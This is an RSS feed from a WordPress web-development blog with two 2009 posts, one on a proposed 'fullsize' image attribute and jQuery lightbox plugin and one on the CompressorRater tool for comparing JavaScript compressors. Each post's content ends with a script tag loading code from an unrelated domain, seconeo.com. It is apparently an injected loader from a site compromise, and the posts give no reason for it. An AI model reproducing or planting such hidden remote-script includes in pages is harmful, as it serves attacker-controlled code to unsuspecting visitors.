<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Spoonfed Project &#187; JavaScript</title>
	<atom:link href="http://spoonfedproject.com/tag/javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://spoonfedproject.com</link>
	<description>Feeding developers quality resources from across the web</description>
	<lastBuildDate>Sat, 05 Jun 2010 13:39:45 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Fullsize, a new jQuery lightbox plugin and IMG Attribute</title>
		<link>http://spoonfedproject.com/jquery/fullsize-a-new-jquery-lightbox-plugin-and-attribute/</link>
		<comments>http://spoonfedproject.com/jquery/fullsize-a-new-jquery-lightbox-plugin-and-attribute/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 16:01:28 +0000</pubDate>
		<dc:creator>brobison</dc:creator>
				<category><![CDATA[jQuery]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[JavaScript]]></category>

		<guid isPermaLink="false">http://spoonfedproject.com/?p=177</guid>
		<description><![CDATA[
Fullsize is an attempt to add a new IMG attribute called &#8220;fullsize&#8221; in the next version of HTML. The idea is simple; create a standardized solution by which browsers handle the image popups rather than javascript/AJAX. Whenever the fullsize attribute is found within the img tag, browsers would tackle the heavy lifting, generating a popup ...]]></description>
			<content:encoded><![CDATA[<p><a href="http://spoonfedproject.com/jquery/fullsize-a-new-jquery-lightbox-plugin-and-attribute" title="a new jQuery plugin and IMG attribute"><img src="http://spoonfedproject.com/wp-content/uploads/2009/03/fullsize-attribute.jpg" alt="A New jQuery Plugin and IMG Attribute" /></a></p>
<p><a href="http://www.addfullsize.com/" title="a new jQuery plugin and IMG attribute">Fullsize</a> is an attempt to add a new IMG attribute called &#8220;fullsize&#8221; in the next version of HTML. The idea is simple; create a standardized solution by which browsers handle the image popups rather than javascript/AJAX. Whenever the fullsize attribute is found within the img tag, browsers would tackle the heavy lifting, generating a popup of the full size image.</p>
<p><span id="more-177"></span></p>
<p><object width="558" height="349"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=3934148&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=0&amp;show_portrait=0&amp;color=7fb2ff&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=3934148&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=0&amp;show_portrait=0&amp;color=7fb2ff&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="558" height="349"></embed></object></p>
<p>Although I&#8217;m still on the fence about this, there are a few aspects that I find interesting. For one, image popups would continue functioning even for users where javascript is disabled. Because this is handled by the browser, less code would need to be written by the developer.</p>
<p>Sounds great, but what if I want to control this myself using jQuery, Mootools or another javascript framework? No problem! The <a href="http://spoonfedproject.com/jquery/extensive-list-of-jquery-lightbox-modal-plugins/">hundreds of lightbox plugins</a> already out there in cyberspace will continue working as intended. Browsers will only step in when the img tag is accompanied by the fullsize attribute.</p>
<p>Who knows if this idea will ever come to fruition. In the meantime however, a <a href="http://www.addfullsize.com/" title="a new jQuery plugin and IMG attribute">jQuery plugin</a> has been created for all to enjoy!</p>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://spoonfedproject.com/jquery/fullsize-a-new-jquery-lightbox-plugin-and-attribute/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Compare various popular JavaScript compression utilities</title>
		<link>http://spoonfedproject.com/javascript/compare-various-popular-javascript-compression-utilities/</link>
		<comments>http://spoonfedproject.com/javascript/compare-various-popular-javascript-compression-utilities/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 04:35:48 +0000</pubDate>
		<dc:creator>brobison</dc:creator>
				<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[compression]]></category>
		<category><![CDATA[jsmin]]></category>
		<category><![CDATA[packer]]></category>
		<category><![CDATA[yui compressor]]></category>

		<guid isPermaLink="false">http://spoonfedproject.com/?p=59</guid>
		<description><![CDATA[
Can&#8217;t decide which JavaScript compressor to use? Then have a look at CompressorRater. It compares various popular JavaScript compression utilities suchs as JSMin, Packer, YUI Compressor and Dojo ShrinkSafe. It will even compare the results with and without the affects of gzip compression.

Give CompressorRater a try.

]]></description>
			<content:encoded><![CDATA[<p><a href="http://spoonfedproject.com/javascript/compare-various-popular-javascript-compression-utilities/"><img class="aligncenter" src="http://spoonfedproject.com/wp-content/uploads/2009/02/compressor-rater.png" alt="compressor-rater" title="compressor-rater" width="546" height="200" class="aligncenter size-full wp-image-60" /></a></p>
<p>Can&#8217;t decide which JavaScript compressor to use? Then have a look at <a href="http://compressorrater.thruhere.net/" title="CompressorRater">CompressorRater</a>. It compares various popular JavaScript compression utilities suchs as <a href="http://crockford.com/javascript/jsmin">JSMin</a>, <a href="http://dean.edwards.name/packer/">Packer</a>, <a href="http://developer.yahoo.com/yui/compressor/">YUI Compressor</a> and <a href="http://dojotoolkit.org/docs/shrinksafe">Dojo ShrinkSafe</a>. It will even compare the results with and without the affects of <a href="http://en.wikipedia.org/wiki/Gzip">gzip</a> compression.</p>
<p><span id="more-59"></span></p>
<p>Give <a href="http://compressorrater.thruhere.net/" title="CompressorRater">CompressorRater</a> a try.</p>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://spoonfedproject.com/javascript/compare-various-popular-javascript-compression-utilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
